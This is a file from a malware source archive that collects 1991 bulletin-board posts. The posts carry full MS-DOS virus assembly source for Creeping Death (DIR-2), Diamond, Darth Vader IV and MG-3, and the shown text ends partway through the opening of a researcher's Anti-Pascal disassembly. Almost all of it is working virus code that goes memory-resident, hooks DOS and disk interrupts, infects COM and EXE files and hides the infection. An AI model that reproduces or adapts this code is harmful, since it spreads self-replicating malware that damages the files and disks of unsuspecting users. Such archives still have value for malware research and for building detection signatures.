MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.vsource.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

1993 lines
57 KiB
NASM
Raw Permalink Blame History

===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3544
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 Conf: (16) VIRUS
---------------------------------------------------------------------------
; Creeping Death V 1.0
;
; (C) Copyright 1991 by VirusSoft Corp.
i13org = 5f8h
i21org = 5fch
org 100h
mov sp,600h
inc counter
xor cx,cx
mov ds,cx
lds ax,[0c1h]
add ax,21h
push ds
push ax
mov ah,30h
call jump
cmp al,4
sbb si,si
mov drive+2,byte ptr -1
mov bx,60h
mov ah,4ah
call jump
mov ah,52h
call jump
push es:[bx-2]
lds bx,es:[bx]
search: mov ax,[bx+si+15h]
cmp ax,70h
jne next
xchg ax,cx
mov [bx+si+18h],byte ptr -1
mov di,[bx+si+13h]
mov [bx+si+13h],offset header
mov [bx+si+15h],cs
next: lds bx,[bx+si+19h]
cmp bx,-1
jne search
jcxz install
pop ds
mov ax,ds
add ax,[3]
inc ax
mov dx,cs
dec dx
cmp ax,dx
jne no_boot
add [3],61h
no_boot: mov ds,dx
mov [1],8
mov ds,cx
les ax,[di+6]
mov cs:str_block,ax
mov cs:int_block,es
cld
mov si,1
scan: dec si
lodsw
cmp ax,1effh
jne scan
mov ax,2cah
cmp [si+4],ax
je right
cmp [si+5],ax
jne scan
right: lodsw
push cs
pop es
mov di,offset modify+1
stosw
xchg ax,si
mov di,offset i13org
cli
movsw
movsw
mov dx,0c000h
fdsk1: mov ds,dx
xor si,si
lodsw
cmp ax,0aa55h
jne fdsk4
cbw
lodsb
mov cl,9
sal ax,cl
fdsk2: cmp [si],6c7h
jne fdsk3
cmp [si+2],4ch
jne fdsk3
push dx
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3545
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
push [si+4]
jmp short death
install: int 20h
file: db "c:",255,0
fdsk3: inc si
cmp si,ax
jb fdsk2
fdsk4: inc dx
cmp dh,0f0h
jb fdsk1
sub sp,4
death: push cs
pop ds
mov bx,[2ch]
mov es,bx
mov ah,49h
call jump
xor ax,ax
test bx,bx
jz boot
mov di,1
seek: dec di
scasw
jne seek
lea si,[di+2]
jmp short exec
boot: mov es,[16h]
mov bx,es:[16h]
dec bx
xor si,si
exec: push bx
mov bx,offset param
mov [bx+4],cs
mov [bx+8],cs
mov [bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh
mov dx,offset file
call jump
pop dx
mov ax,4b00h
call jump
mov ah,4dh
call jump
mov ah,4ch
jump: pushf
call dword ptr cs:[i21org]
ret
;--------Installation complete
i13pr: mov ah,3
jmp dword ptr cs:[i13org]
main: push ax ; driver
push cx ; strategy block
push dx
push ds
push si
push di
push es
pop ds
mov al,[bx+2]
cmp al,4 ; Input
je input
cmp al,8
je output
cmp al,9
je output
call in
cmp al,2 ; Build BPB
jne ppp ;
lds si,[bx+12h]
mov di,offset bpb_buf
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es
push cs
pop es
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3546
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,[di+2-32]
cmp al,2
adc al,0
cbw
cmp [di+8-32],0
je m32
sub [di+8-32],ax
jmp short ppp
m32: sub [di+15h-32],ax
sbb [di+17h-32],0
ppp: pop di
pop si
pop ds
pop dx
pop cx
pop ax
rts: retf
output: mov cx,0ff09h
call check
jz inf_sec
call in
jmp short inf_dsk
inf_sec: jmp _inf_sec
read: jmp _read
read_: add sp,16
jmp short ppp
input: call check
jz read
inf_dsk: mov byte ptr [bx+2],4
cld
lea si,[bx+0eh]
mov cx,8
save: lodsw
push ax
loop save
mov [bx+14h],1
call driver
jnz read_
mov byte ptr [bx+2],2
call in
lds si,[bx+12h]
mov ax,[si+6]
add ax,15
mov cl,4
shr ax,cl
mov di,[si+0bh]
add di,di
stc
adc di,ax
push di
cwd
mov ax,[si+8]
test ax,ax
jnz more
mov ax,[si+15h]
mov dx,[si+17h]
more: xor cx,cx
sub ax,di
sbb dx,cx
mov cl,[si+2]
div cx
cmp cl,2
sbb ax,-1
push ax
call convert
mov byte ptr es:[bx+2],4
mov es:[bx+14h],ax
call driver
again: lds si,es:[bx+0eh]
add si,dx
sub dh,cl
adc dx,ax
mov cs:gad+1,dx
cmp cl,1
je small
mov ax,[si]
and ax,di
cmp ax,0fff7h
je bad
cmp ax,0ff7h
je bad
cmp ax,0ff70h
jne ok
bad: pop ax
dec ax
push ax
call convert
jmp short again
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3547
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
small: not di
and [si],di
pop ax
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz here
inc dx
mul dx
here: or [si],ax
pop ax
call convert
mov si,es:[bx+0eh]
add si,dx
mov ax,[si]
and ax,di
ok: mov dx,di
dec dx
and dx,di
not di
and [si],di
or [si],dx
cmp ax,dx
pop ax
pop di
mov cs:pointer+1,ax
je _read_
mov dx,[si]
push ds
push si
call write
pop si
pop ds
jnz _read_
call driver
cmp [si],dx
jne _read_
dec ax
dec ax
mul cx
add ax,di
adc dx,0
push es
pop ds
mov [bx+12h],2
mov [bx+14h],ax
test dx,dx
jz less
mov [bx+14h],-1
mov [bx+1ah],ax
mov [bx+1ch],dx
less: mov [bx+10h],cs
mov [bx+0eh],100h
call write
_read_: std
lea di,[bx+1ch]
mov cx,8
load: pop ax
stosw
loop load
_read: call in
mov cx,9
_inf_sec:
mov di,es:[bx+12h]
lds si,es:[bx+0eh]
sal di,cl
xor cl,cl
add di,si
xor dl,dl
push ds
push si
call find
jcxz no_inf
call write
and es:[bx+4],byte ptr 07fh
no_inf: pop si
pop ds
inc dx
call find
jmp ppp
;--------Subroutines
find: mov ax,[si+8]
cmp ax,"XE"
jne com
cmp [si+10],al
je found
com: cmp ax,"OC"
jne go_on
cmp byte ptr [si+10],"M"
jne go_on
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3548
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
found: test [si+1eh],0ffc0h ; >4MB
jnz go_on
test [si+1dh],03ff8h ; <2048B
jz go_on
test [si+0bh],byte ptr 1ch
jnz go_on
test dl,dl
jnz rest
pointer: mov ax,1234h
cmp ax,[si+1ah]
je go_on
xchg ax,[si+1ah]
gad: xor ax,1234h
mov [si+14h],ax
loop go_on
rest: xor ax,ax
xchg ax,[si+14h]
xor ax,cs:gad+1
mov [si+1ah],ax
go_on: ;rol cs:gad+1,1
db 2eh,0d1h,6
dw offset gad+1
add si,32
cmp di,si
jne find
ret
check: mov ah,[bx+1]
drive: cmp ah,-1
mov cs:[drive+2],ah
jne changed
push [bx+0eh]
mov byte ptr [bx+2],1
call in
cmp byte ptr [bx+0eh],1
pop [bx+0eh]
mov [bx+2],al
changed: ret
write: cmp byte ptr es:[bx+2],8
jae in
mov byte ptr es:[bx+2],4
mov si,70h
mov ds,si
modify: mov si,1234h
push [si]
push [si+2]
mov [si],offset i13pr
mov [si+2],cs
call in
pop [si+2]
pop [si]
ret
driver: mov es:[bx+12h],1
in:
db 09ah
str_block:
dw ?,70h
db 09ah
int_block:
dw ?,70h
test es:[bx+4],byte ptr 80h
ret
convert: cmp ax,0ff0h
jae fat_16
mov si,3
xor cs:[si+gad-1],si
mul si
shr ax,1
mov di,0fffh
jnc cont
mov di,0fff0h
jmp short cont
fat_16: mov si,2
mul si
mov di,0ffffh
cont: mov si,512
div si
header: inc ax
ret
counter: dw 0
dw 842h
dw offset main
dw offset rts
db 7fh
param: dw 0,80h,?,5ch,?,6ch,?
bpb_buf: db 32 dup(?)
f_name: db 80 dup(?)
;--------The End.
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (19:52) Number: 3549
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIR-2 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
---
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3550
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND Conf: (16) VIRUS
---------------------------------------------------------------------------
; The Diamond Virus
;
; Version 2.10
;
; also known as:
; V1024, V651, The EGN Virus
;
; Basic release: 5-Aug-1989
; Last patch: 5-May-1990
;
; COPYRIGHT:
;
; This program is (c) Copyright 1989,1990 Damage, Inc.
; Permission is granted to distribute this source provided the tittle
page is
; preserved.
; Any fee can be charged for distribution of this source, however,
Damage, Inc.
; distributes it freely.
; You are specially prohibited to use this program for military
purposes.
; Damage, Inc. is not liable for any kind of damages resulting from
the use of
; or the inability to use this software.
;
; To assemble this program use Turbo Assembler 1.0
.radix 16
.model tiny
.code
code_len = top_code-main_entry
data_len = top_data-top_code
main_entry:
call locate_address
gen_count dw 0
locate_address:
xchg ax,bp
cld
pop bx
inc word ptr cs:[bx]
mov ax,0d5aa
int 21
cmp ax,2a03
jz all_done
mov ax,sp
inc ax
mov cl,4
shr ax,cl
inc ax
mov dx,ss
add ax,dx
mov dx,ds
dec dx
mov es,dx
xor di,di
mov cx,(top_data-main_entry-1)/10+1
mov dx,[di+2]
sub dx,cx
cmp dx,ax
jc all_done
cli
sub es:[di+3],cx
mov [di+2],dx
mov es,dx
lea si,[bx+main_entry-gen_count]
mov cx,top_code-main_entry
rep
db 2e
movsb
push ds
mov ds,cx
mov si,20
lea di,[di+old_vector-top_code]
org $-1
mov ax,offset dos_handler
xchg ax,[si+64]
stosw
mov ax,es
xchg ax,[si+66]
stosw
mov ax,offset time_handler
xchg ax,[si]
stosw
xchg ax,dx
xchg ax,[si+2]
stosw
mov ax,24
stosw
pop ds
push ds
pop es
sti
all_done:
lea si,[bx+exe_header-gen_count]
db 2e
lodsw
cmp ax,'ZM'
jz exit_exe
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3551
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
mov di,100
push di
stosw
movsb
xchg ax,bp
ret
exit_exe:
mov dx,ds
add dx,10
add cs:[si+return_address+2-exe_header-2],dx
org $-1
add dx,cs:[si+stack_offset+2-exe_header-2]
org $-1
mov ss,dx
mov sp,cs:[si+stack_offset-exe_header-2]
org $-1
xchg ax,bp
jmp dword ptr
cs:[si+return_address-exe_header-2]
org $-1
infect:
mov dx,offset exe_header
mov cx,top_header-exe_header
mov ah,3f
int 21
jc do_exit
sub cx,ax
jnz go_error
mov di,offset exe_header
les ax,[di+ss_offset-exe_header]
org $-1
mov [di+stack_offset-exe_header],es
org $-1
mov [di+stack_offset+2-exe_header],ax
org $-1
les ax,[di+ip_offset-exe_header]
org $-1
mov [di+return_address-exe_header],ax
org $-1
mov [di+return_address+2-exe_header],es
org $-1
mov dx,cx
mov ax,4202
int 21
jc do_exit
mov [di+file_size-exe_header],ax
org $-1
mov [di+file_size+2-exe_header],dx
org $-1
mov cx,code_len
cmp ax,cx
sbb dx,0
jc do_exit
xor dx,dx
mov si,'ZM'
cmp si,[di]
jz do_put_image
cmp [di],'MZ'
jz do_put_image
cmp ax,0fe00-code_len
jc put_image
go_error:
stc
do_exit:
ret
do_put_image:
cmp dx,[di+max_size-exe_header]
org $-1
jz go_error
mov [di],si
put_image:
mov ah,40
int 21
jc do_exit
sub cx,ax
jnz go_error
mov dx,cx
mov ax,4200
int 21
jc do_exit
mov ax,[di+file_size-exe_header]
org $-1
cmp [di],'ZM'
jnz com_file
mov dx,[di+file_size-exe_header+2]
org $-1
mov cx,4
push di
mov si,[di+header_size-exe_header]
org $-1
xor di,di
shift_size:
shl si,1
rcl di,1
loop shift_size
sub ax,si
sbb dx,di
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3552
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
pop di
mov cl,0c
shl dx,cl
mov [di+ip_offset-exe_header],ax
org $-1
mov [di+cs_offset-exe_header],dx
org $-1
add dx,(code_len+data_len+100-1)/10+1
org $-1
mov [di+sp_offset-exe_header],ax
org $-1
mov [di+ss_offset-exe_header],dx
org $-1
add word ptr
[di+min_size-exe_header],(data_len+100-1)/10+1
org $-2
mov ax,[di+min_size-exe_header]
org $-1
cmp ax,[di+max_size-exe_header]
org $-1
jc adjust_size
mov [di+max_size-exe_header],ax
org $-1
adjust_size:
mov ax,[di+last_page-exe_header]
org $-1
add ax,code_len
push ax
and ah,1
mov [di+last_page-exe_header],ax
org $-1
pop ax
mov cl,9
shr ax,cl
add [di+page_count-exe_header],ax
org $-1
jmp short put_header
com_file:
sub ax,3
mov byte ptr [di],0e9
mov [di+1],ax
put_header:
mov dx,offset exe_header
mov cx,top_header-exe_header
mov ah,40
int 21
jc error
cmp ax,cx
jz reset
error:
stc
reset:
ret
find_file:
pushf
push cs
call calldos
test al,al
jnz cant_find
push ax
push bx
push es
mov ah,51
int 21
mov es,bx
cmp bx,es:[16]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2f
int 21
pop ax
inc al
jnz fcb_standard
add bx,7
fcb_standard:
mov ax,es:[bx+17]
and ax,1f
xor al,1e
jnz not_infected
and byte ptr es:[bx+17],0e0
sub es:[bx+1dh],code_len
sbb es:[bx+1f],ax
not_infected:
pop es
pop bx
pop ax
cant_find:
iret
dos_handler:
cmp ah,4bh
jz exec
cmp ah,11
jz find_file
cmp ah,12
jz find_file
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3553
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
cmp ax,0d5aa
jnz calldos
not ax
fail:
mov al,3
iret
exec:
cmp al,2
jnc calldos
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
mov ax,3524
int 21
push es
push bx
mov ah,25
push ax
push ds
push dx
push cs
pop ds
mov dx,offset fail
int 21
pop dx
pop ds
mov ax,4300
int 21
jc exit
test cl,1
jz open
dec cx
mov ax,4301
int 21
open:
mov ax,3d02
int 21
jc exit
xchg ax,bx
mov ax,5700
int 21
jc close
mov al,cl
or cl,1f
dec cx
xor al,cl
jz close
push cs
pop ds
push cx
push dx
call infect
pop dx
pop cx
jc close
mov ax,5701
int 21
close:
mov ah,3e
int 21
exit:
pop ax
pop dx
pop ds
int 21
pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
calldos:
jmp cs:[old_vector]
.radix 10
adrtbl dw
1680,1838,1840,1842,1996,1998,2000,2002,2004,2154,2156
dw
2158,2160,2162,2164,2166,2316,2318,2320,2322,2324,2478
dw 2480,2482,2640
diftbl dw
-324,-322,-156,158,-318,-316,318,156,162,316,164,-322
dw
-162,-322,322,322,-324,-158,164,316,-324,324,-316,-164
dw 324
valtbl dw
3332,3076,3076,3076,3588,3588,3588,3588,3588,3844,3844
dw
3844,3844,3844,3844,3844,2564,2564,2564,2564,2564,2820
dw 2820,2820,2308
xlatbl dw
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3554
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
-324,316,-164,156,-322,318,-162,158,-318,322,-158,162
dw -316,324,-156,164
.radix 16
time_handler:
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
push cs
pop ds
cld
mov dx,3da
mov cx,19
mov si,offset count
mov ax,[si]
test ah,ah
jnz make_move
mov al,ah
mov es,ax
cmp al,es:[46dh]
jnz exit_timer
mov ah,0f
int 10
cmp al,2
jz init_diamond
cmp al,3
jnz exit_timer
init_diamond:
inc byte ptr [si+1]
sub bl,bl
add bh,0b8
mov [si+2],bx
mov es,bx
wait_snow:
in al,dx
test al,8
jz wait_snow
mov si,offset valtbl
build_diamond:
mov di,[si+adrtbl-valtbl]
movsw
loop build_diamond
exit_timer:
pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
jmp cs:[old_timer]
count_down:
dec byte ptr [si]
jmp exit_timer
make_move:
test al,al
jnz count_down
inc byte ptr [si]
mov si,offset adrtbl
make_step:
push cx
push cs
pop es
lodsw
mov bx,ax
sub ax,140
cmp ax,0d20
jc no_xlat
test ax,ax
mov ax,[si+diftbl-adrtbl-2]
jns test_xlat
test ax,ax
js do_xlat
jmp short no_xlat
test_xlat:
test ax,ax
js no_xlat
do_xlat:
mov di,offset xlatbl
mov cx,10
repnz scasw
dec di
dec di
xor di,2
mov ax,[di]
mov [si+diftbl-adrtbl-2],ax
no_xlat:
mov ax,[si-2]
add ax,[si+diftbl-adrtbl-2]
mov [si-2],ax
mov cx,19
mov di,offset adrtbl
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:00) Number: 3555
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DIAMOND <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
lookup:
jcxz looked_up
repnz scasw
jnz looked_up
cmp si,di
jz lookup
mov [si-2],bx
mov ax,[si+diftbl-adrtbl-2]
xchg ax,[di+diftbl-adrtbl-2]
mov [si+diftbl-adrtbl-2],ax
jmp lookup
looked_up:
mov es,[homeadr]
mov di,bx
xor bx,bx
call out_char
mov di,[si-2]
mov bx,[si+valtbl-adrtbl-2]
call out_char
pop cx
loop make_step
jmp exit_timer
out_char:
in al,dx
test al,1
jnz out_char
check_snow:
in al,dx
test al,1
jz check_snow
xchg ax,bx
stosw
ret
stack_offset dd ?
return_address dd ?
db '7106286813'
exe_header: int 20
last_page: nop
top_code:
db ?
page_count dw ?
dw ?
header_size dw ?
min_size dw ?
max_size dw ?
ss_offset dw ?
sp_offset dw ?
dw ?
ip_offset dw ?
cs_offset dw ?
top_header:
file_size dd ?
old_vector dd ?
old_timer dd ?
count db ?
flag db ?
homeadr dw ?
top_data:
end
---
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:06) Number: 3556
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DARTH VADER Conf: (16) VIRUS
---------------------------------------------------------------------------
;*********************************************************************
**********
;*
*
;* D A R T H V A D E R IV
*
;*
*
;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia
*
;* All Rights Reserved
*
;*
&
;* Enchanced by: Lazy Wizard
&
;*
&
;* Turbo Assembler 2.0
&
;*
&
;*********************************************************************
**********
.model tiny
.code
org 100h
Start:
call NextLine
First3:
int 20h
int 3
NextLine:
pop bx
push ax
xor di,di
mov es,di
mov es,es:[2Bh*4+2]
mov cx,1000h
call SearchZero
jc ReturnControl
xchg ax,si
inc si
SearchTable:
dec si
db 26h
lodsw
cmp ax,8B2Eh
jne SearchTable
db 26h
lodsb
cmp al,75h
je ReturnControl
cmp al,9Fh
jne SearchTable
mov si,es:[si]
mov cx,LastByte-Start
lea ax,[di+Handle-Start]
org $-1
xchg ax,es:[si+80h]
sub ax,di
sub ax,cx
mov [bx+OldWrite-Start-2],ax
mov word ptr [bx+NewStart+1-Start-3],di
lea si,[bx-3]
rep movsb
ReturnControl:
pop ax
push ss
pop es
mov di,100h
lea si,[bx+First3-Start-3]
push di
movsw
movsb
ret
SearchZero:
xor ax,ax
inc di
push cx
push di
mov cx,(LastByte-Start-1)/2+1
repe scasw
pop di
pop cx
je FoundPlace
loop SearchZero
stc
FoundPlace:
ret
Handle:
push bp
call NextHandle
NextHandle:
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:06) Number: 3557
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: DARTH VADER <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
pop bp
push es
push ax
push bx
push cx
push si
push di
test ch,ch
je Do
mov ax,1220h
int 2Fh
mov bl,es:[di]
mov ax,1216h
int 2Fh
cmp es:[di+29h],'MO'
jne Do
cmp word ptr es:[di+15h],0
jne Do
push ds
pop es
mov di,dx
mov ax,[di]
mov [bp+First3-NextHandle],ax
mov al,[di+2]
mov [bp+First3+2-NextHandle],al
call SearchZero
jc Do
push di
NewStart:
mov si,0
mov cx,(LastByte-Start-1)/2
cli
rep
db 36h
movsw
sti
mov di,dx
mov al,0E9h
stosb
pop ax
sub ax,di
dec ax
dec ax
stosw
Do:
pop di
pop si
pop cx
pop bx
pop ax
pop es
pop bp
OldWrite:
jmp start
LastByte label byte
end Start
---
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:07) Number: 3558
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: MG 3 Conf: (16) VIRUS
---------------------------------------------------------------------------
; (C) Copyright VirusSoft Corp. Sep., 1990
;
; This is the SOURCE file of last version of MASTER,(V500),(MG) ect.
; virus, distributed by VirusSoft company . First version was made
; in May., 1990 . Please don't make any corections in this file !
;
; Bulgaria, Varna
; Sep. 27, 1990
ofs = 201h
len = offset end-ofs
call $+6
org ofs
first: dw 020cdh
db 0
pop di
dec di
dec di
mov si,[di]
dec di
add si,di
push cs
push di
cld
movsw
movsb
xchg ax,dx
mov ax,4b04h
int 21h
jnc residnt
xor ax,ax
mov es,ax
mov di,ofs+3
mov cx,len-3
rep movsb
les di,[6]
mov al,0eah
dec cx
repne scasb
les di,es:[di] ; Searching for the INT21 vector
sub di,-1ah-7
db 0eah
dw offset jump,0 ; jmp far 0000:jump
jump: push es
pop ds
mov si,[di+3-7] ;
lodsb ;
cmp al,68h ; compare DOS Ver
mov [di+4-7],al ; Change CMP AH,CS:[????]
mov [di+2-7],0fc80h ;
mov [di-7],0fccdh ;
push cs
pop ds
mov [1020],di ; int 0ffh
mov [1022],es
mov beg-1,byte ptr not3_3-beg
jb not3.3 ; CY = 0 --> DOS Ver > or = 3.30
mov beg-1,byte ptr 0
mov [7b4h],offset pr7b4
mov [7b6h],cs ; 7b4
not3.3: mov al,0a9h ; Change attrib
cont: repne scasb
cmp es:[di],0ffd8h
jne cont
mov al,18h
stosb
push ss
pop ds
push ss
pop es
residnt: xchg ax,dx
retf ; ret far
;--------Interrupt process--------;
i21pr: push ax
push dx
push ds
push cx
push bx
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:07) Number: 3559
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: MG 3 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
push es
if4b04: cmp ax,4b04h
je rti
xchg ax,cx
mov ah,02fh
int 0ffh
if11_12: cmp ch,11h
je yes
cmp ch,12h
jne inffn
yes: xchg ax,cx
int 0ffh
push ax
test es:byte ptr [bx+19],0c0h
jz normal
sub es:[bx+36],len
normal: pop ax
rti: pop es
pop bx
pop cx
add sp,12
iret
inffn: mov ah,19h
int 0ffh
push ax
if36: cmp ch,36h ; -free bytes
je beg_36
if4e: cmp ch,4eh ; -find first FM
je beg_4b
if4b: cmp ch,4bh ; -exec
je beg_4b
if47: cmp ch,47h ; -directory info
jne if5b
cmp al,2
jae begin ; it's hard-disk
if5b: cmp ch,5bh ; -create new
je beg_4b
if3c_3d: shr ch,1 ; > -open & create
cmp ch,1eh ; -
je beg_4b
jmp rest
beg_4b: mov ax,121ah
xchg dx,si
int 2fh
xchg ax,dx
xchg ax,si
beg_36: mov ah,0eh ; change current drive
dec dx ;
int 0ffh ;
begin:
push es ; save DTA address
push bx ;
sub sp,44
mov dx,sp ; change DTA
push sp
mov ah,1ah
push ss
pop ds
int 0ffh
mov bx,dx
push cs
pop ds
mov ah,04eh
mov dx,offset file
mov cx,3 ; r/o , hidden
int 0ffh ; int 21h
jc lst
next: test ss:[bx+21],byte ptr 80h
jz true
nxt: mov ah,4fh ; find next
int 0ffh
jnc next
lst: jmp last
true: cmp ss:[bx+27],byte ptr 0fdh
ja nxt
mov [144],offset i24pr
mov [146],cs
les ax,[4ch] ; int 13h
mov i13adr,ax
mov i13adr+2,es
jmp short $
beg: mov [4ch],offset i13pr
mov [4eh],cs
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:07) Number: 3560
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: MG 3 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
;
not3_3: push ss
pop ds
push [bx+22] ; time +
push [bx+24] ; date +
push [bx+21] ; attrib +
lea dx,[bx+30] ; ds : dx = offset file name
mov ax,4301h ; Change attrib !!!
pop cx
and cx,0feh ; clear r/o and CH
or cl,0c0h ; set Infect. attr
int 0ffh
mov ax,03d02h ; open
int 0ffh ; int 21h
xchg ax,bx
push cs
pop ds
mov ah,03fh
mov cx,3
mov dx,offset first
int 0ffh
mov ax,04202h ; move fp to EOF
xor dx,dx
mov cx,dx
int 0ffh
mov word ptr cal_ofs+1,ax
mov ah,040h
mov cx,len
mov dx,ofs
int 0ffh
jc not_inf
mov ax,04200h
xor dx,dx
mov cx,dx
int 0ffh
mov ah,040h
mov cx,3
mov dx,offset cal_ofs
int 0ffh
not_inf: mov ax,05701h
pop dx ; date
pop cx ; time
int 0ffh
mov ah,03eh ; close
int 0ffh
les ax,dword ptr i13adr
mov [4ch],ax ; int 13h
mov [4eh],es
last: add sp,46
pop dx
pop ds ; restore DTA
mov ah,1ah
int 0ffh
rest: pop dx ; restore current drive
mov ah,0eh ;
int 0ffh ;
pop es
pop bx
pop cx
pop ds
pop dx
pop ax
i21cl: iret ; Return from INT FC
i24pr: mov al,3 ; Critical errors
iret
i13pr: cmp ah,3
jne no
inc byte ptr cs:activ
dec ah
no: jmp dword ptr cs:i13adr
pr7b4: db 2eh,0d0h,2eh
dw offset activ
; shr cs:activ,1
jnc ex7b0
inc ah
ex7b0: jmp dword ptr cs:[7b0h]
;--------
file: db "*",32,".COM"
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:07) Number: 3561
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: MG 3 <CONT> Conf: (16) VIRUS
---------------------------------------------------------------------------
activ: db 0
dw offset i21pr ; int 0fch
dw 0
cal_ofs: db 0e8h
end:
dw ? ; cal_ofs
i13adr: dw ?
dw ?
; The End.---
* Origin: ESaSS / Thunderbyte support, The Netherlands (2:280/200)
---
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
===========================================================================
BBS: The Programmer's Inn
Date: 11-24-91 (20:08) Number: 3562
From: AHMED DOGAN Refer#: NONE
To: ALL Recvd: NO
Subj: ANTI PASCAL Conf: (16) VIRUS
---------------------------------------------------------------------------
page ,132
name AP400
title The 'Anti-Pascal' virus, version AP-400
.radix 16
;
......................................................................
......
; . Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5,
ap. 51 .
; . Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
.
; .
.
; . The 'Anti-Pascal' Virus, version AP-400
.
; . Disassembled by Vesselin Bontchev, July 1990
.
; .
.
; . Copyright (c) Vesselin Bontchev 1989, 1990
.
; .
.
; . This listing is only to be made available to virus
researchers .
; . or software writers on a need-to-know basis.
.
;
......................................................................
......
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
v_const = 2042d
start:
jmp v_entry
db 0CA ; Virus signature
db (2048d - 9) dup (90) ; The original "program"
mov ax,4C00 ; Just exit
int 21
v_start label byte
first4 db 0E9, 0F8, 7, 90
allcom db '*.COM', 0
mydta label byte
reserve db 15 dup (?)
attrib db ?
time dw ?
date dw ?
fsize dd ?
namez db 14d dup (?)
allp db 0, '?????????A?'
maxdrv db ?
sign db 'PAD'
v_entry:
push ax ; Save AX & DX
push dx
mov ah,19 ; Get the default drive
int 21
push ax ; Save it on stack
mov ah,0E ; Set it as default (?!)
mov dl,al
